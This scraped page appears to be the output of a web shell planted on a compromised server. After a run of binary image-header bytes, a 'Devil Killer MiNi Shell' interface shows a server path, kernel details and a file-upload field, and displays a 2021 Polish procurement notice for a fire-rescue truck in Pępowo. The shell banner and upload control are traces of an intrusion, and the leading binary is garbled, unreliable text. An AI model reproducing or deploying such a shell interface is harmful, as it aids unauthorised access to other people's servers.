JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210816/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210816/0014949301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup ciężkiego samochodu ratowniczo-gaśniczego dla Ochotniczej Straży Pożarnej w Pępowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PĘPOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050592</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisławy Nadstawek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pępowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-830</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">655736305</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@pepowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pepowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zgodnie z ustawą z dnia 8 marca 1990 r. o samorządzie gminnym </p> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Gmina Pępowo na rzecz Ochotniczej Straży Pożarnej w Pępowie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">6961840454</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Stanisławy Nadstawek 6</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Pępowo</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">63-830</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">655736305</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">ug@pepowo.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.pepowo.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup ciężkiego samochodu ratowniczo-gaśniczego dla Ochotniczej Straży Pożarnej w Pępowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-39c69682-fe65-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00149493</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003316/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup samochodu strażackiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pepowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/pepowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta,<br/>wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą<br/>zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem<br/>osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na<br/>platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty wykonawca<br/>składa bezpośrednio na dokumencie, który następnie przesyła do systemu.2. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows<br/>7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna przeglądarka internetowa, w<br/>przypadku Internet Explorer minimalnie wersja 10 0.,d) włączona obsługa JavaScript,e) zainstalowany<br/>program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f) Szyfrowanie na<br/>platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.g) Oznaczenie czasu odbioru danych<br/>przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.3. Podpisy kwalifikowane<br/>wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać<br/>“Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług<br/>zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014<br/>- od 1 lipca 2016 roku” W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający<br/>wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu<br/>w formacie XAdES.4. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy<br/>komunikacji wielkość pliku to maksymalnie 500 MB.5. Rozszerzenia plików wykorzystywanych przez<br/>wykonawców powinny być zgodne z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9<br/>listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”6. W<br/>celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij<br/>wiadomość do zamawiającego”. W przypadku problemów technicznych związanych z obsługą<br/>platformazakupowa.pl Zamawiający dopuszcza kontakt przy użyciu poczty elektronicznej<br/>przetargi@pepowo.pl jako kanału pomocniczego w sytuacjach awaryjnych.6. Szczegółowe informacje<br/>techniczne i organizacyjne dot. korespondencji elektronicznej zawarto w rozdziale 6.5, 7 i 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami rozdziału 21 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z postanowieniami rozdziału 21 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSP.271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiotem zamówienia jest wykonanie dostaw dla zadania pn. „Zakup ciężkiego samochodu ratowniczo-gaśniczego dla Ochotniczej Straży Pożarnej w Pępowie”. <br/><br/>3.2.	Zakres zamówienia obejmuje dostawę fabrycznie nowego ciężkiego samochodu ratowniczo – gaśniczego spełniającego wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych tj.:<br/>	- ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tj. Dz. U. z 2020 r., poz. 110 ze zm.),<br/>	- rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (tj. Dz. U. z 2016 r. poz. 2022 ze zm.).<br/>	- rozporządzenia Ministrów: Spraw Wewnętrznych i Administracji, Obrony Narodowej, Finansów oraz Sprawiedliwości z dnia 22 marca 2019 r. w sprawie pojazdów specjalnych i używanych do celów specjalnych Policji, Agencji Bezpieczeństwa Wewnętrznego, Agencji Wywiadu, Służby Kontrwywiadu Wojskowego, Służby Wywiadu Wojskowego, Centralnego Biura Antykorupcyjnego, Straży Granicznej, Biura Ochrony Państwa, Krajowej Administracji Skarbowej, Służby Więziennej i straży pożarnej (Dz. U. z 2019 r. poz. 594).<br/><br/>3.3. Szczegółowy opis przedmiotu zamówienia wraz z wykazem minimalnych parametrów samochodu zawiera załącznik nr 1 do niniejszej SWZ.<br/><br/>UWAGA! Wykonawca załączy wypełnioną tabelę stanowiącą załącznik nr 1 do niniejszej SWZ do oferty. Prawą stronę tabeli, należy wypełnić stosując słowa „spełnia” lub wpisać oferowane równoważne wartości techniczno-użytkowe. W przypadku, gdy Wykonawca w którejkolwiek z pozycji zaoferuje niższe wartości oferta zostanie odrzucona, gdyż jej treść nie odpowiada treści SWZ<br/><br/>3.4.	Zamawiający dopuszcza możliwość złożenia oferty równoważnej.	<br/><br/>3.5. Zamawiający dopuszcza możliwość złożenia oferty równoważnej, tj. zaproponowania rozwiązań równoważnych w stosunku do opisanych, z zastosowaniem tych samych standardów technicznych i jakościowych niezbędnych do prawidłowego funkcjonowania zamawianego produktu. Zgodnie z art. 99 ust. 5 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza produkty równoważne pod warunkiem, że przedmiot oferty jest identyczny funkcjonalnie i posiada parametry techniczne (w szczególności: konstrukcja, zastosowane materiały, rozmiary itp.) i użytkowe nie gorsze niż określone w SWZ, a także jest zgodny z obowiązującymi wymaganiami prawnymi. Zamawiający do oceny równoważności będzie brał pod uwagę parametry wskazane w opisie przedmiotu zamówienia.<br/><br/>3.6.	Ilekroć w niniejszej SWZ wraz z załącznikami przedmiot zamówienia jest opisany ze wskazaniem znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, to przyjmuje się, że każdemu takiemu wskazaniu towarzyszą wyrazy „lub równoważny”, a wskazanie ma charakter przykładowy. <br/><br/>3.7. Zamawiający dopuszcza rozwiązania równoważne opisywanym przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, a odniesieniu takiemu towarzyszą wyrazy „lub równoważne”.<br/><br/>3.8.	Wykonawca, który powołuje się na rozwiązanie równoważne opisywane przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego materiały i urządzenia spełniają wymagania określone przez Zamawiającego. W szczególności Wykonawca zobowiązany jest przedłożyć Zamawiającemu wraz z ofertą dokładny opis oferowanego rozwiązania równoważnego.<br/><br/>3.9.	Przedmiot zamówienia obejmuje wykonanie przeglądu technicznego przed wydaniem pojazdu Zamawiającemu. Wykonawca zobowiązany jest dostarczyć dokument potwierdzający, że badanie techniczne pojazdu dopuszczające do ruchu jest ważne min. 10 miesięcy od daty dostawy przedmiotu zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144210-3 - Wozy strażackie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującym kryterium:<br/>15.1.1. Cena 60%<br/>15.1.2. Termin gwarancji i rękojmi na zabudowę samochodu (zwane dalej terminem gwarancji i rękojmi) 20 %<br/>15.1.3. Jakość w tym parametry techniczne 20 %<br/><br/>Razem 100 % = 100 pkt<br/><br/>15.2. Ranking ofert przy uwzględnieniu ww. kryteriów ustalony będzie w skali do 100 punktów, w następujący sposób:<br/>P = Pc + Pg +Pj<br/>P = punkty za ofertę<br/>Pc = punkty za cenę<br/>Pg = punkty za termin gwarancji i rękojmi <br/>Pj = punkty za jakość w tym parametry techniczne<br/><br/>Punktacja:<br/>-punkty za cenę:<br/>Pc -ilość punktów za cenę,<br/>Pc = 60 % = 60pkt<br/>Pc = (Cncb/Cbob) x 60pkt x 100%, gdzie:<br/>Cncb -cena najniższa brutto wśród ofert niepodlegających odrzuceniu,<br/>Cbob -cena brutto oferty badanej<br/><br/>-punkty za termin gwarancji i rękojmi:<br/>Pg –ilość punktów za termin gwarancji i rękojmi<br/>Pg = 20 % = 20 pkt<br/><br/>Punktacja za termin gwarancji i rękojmi –gwarancja i rękojmia obejmuje:<br/>- 36 miesięcy = 0 pkt x 100% = 0 pkt<br/>- 48 miesięcy= 10 pkt x 100% = 10 pkt<br/>- 60 miesięcy= 20 pkt x 100% = 20 pkt<br/><br/>Wykonawca wskazuje ewentualne zaoferowanie dłuższego terminu gwarancji i rękojmi w załączniku nr 2 do SWZ –formularz oferty. Wykonawca chcący zaoferować wydłużony termin gwarancji i rękojmi wybiera odpowiedni punkt w formularzu oferty. Brak wpisu w formularzu oferty traktowany będzie jako oferowanie tylko i wyłącznie minimalnego 36 miesięcznego okresu gwarancji i rękojmi a Wykonawca otrzyma za kryterium gwarancji 0 pkt.<br/><br/>- punkty za jakość w tym parametry techniczne:<br/>Pj - punkty za jakość w tym parametry techniczne<br/>Pj = 20 % = 20 pkt<br/><br/>Punktacja za jakość w tym parametry techniczne obejmuje moc silnika:<br/>a) od 250 kW do 260 kW = 0 pkt x 100% = 0 pkt<br/>b) od 261 kW do 270 kW = 10 pkt x 100% = 10 pkt<br/>d) od 271 kW i więcej = 20 pkt x 100% = 20 pkt<br/><br/>Uwaga:<br/>W przypadku, kiedy Wykonawca nie wypełni w formularzu ofertowym parametrów technicznych w kryterium oceny „Jakość w tym parametry techniczne – moc silnika”, Zamawiający przyjmie, że Wykonawca oferuje samochód ratowniczo-gaśniczego o mocy silnika 250 kW – 260 kW, a w kryterium oceny „Jakość w tym parametry techniczne – moc silnika”, otrzyma 0 pkt. <br/><br/>15.3. Za najkorzystniejszą ofertę Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji i rękojmi na zabudowę samochodu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Moc silnika</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki z art. 112 ust. 2 ustawy PZP, dotyczące:<br/><br/>	a) Zdolności do występowania w obrocie gospodarczym<br/>	Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/>	<br/>	b) Uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów. <br/>	Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/>	<br/>	c) Sytuacji ekonomicznej i finansowej <br/>	Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/><br/> d) Zdolności technicznej lub zawodowej<br/>	- Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał co najmniej jedną dostawę jednego ciężkiego samochodu ratowniczo – gaśniczego, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wystarczające jest, aby dowolny Wykonawca/Wykonawcy wspólnie ubiegający się o zamówienie, wykazał spełnianie tego warunku, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 4 ustawy PZP (pkt 5.2. oraz 5.3. niniejszej SWZ):<br/><br/> a) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 109 ust. 1 pkt. 4 ustawy PZP sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem;<br/>b) oświadczenia o braku przynależności do tej samej grupy kapitałowej . w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej zgodnie z załącznikiem Nr 7 do niniejszej SWZ<br/>6.4.	Dokumenty podmiotów zagranicznych. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6.3.2. lit. a niniejszej SWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, odpowiednio że:<br/><br/>	6.4.1. nie otwarto jego 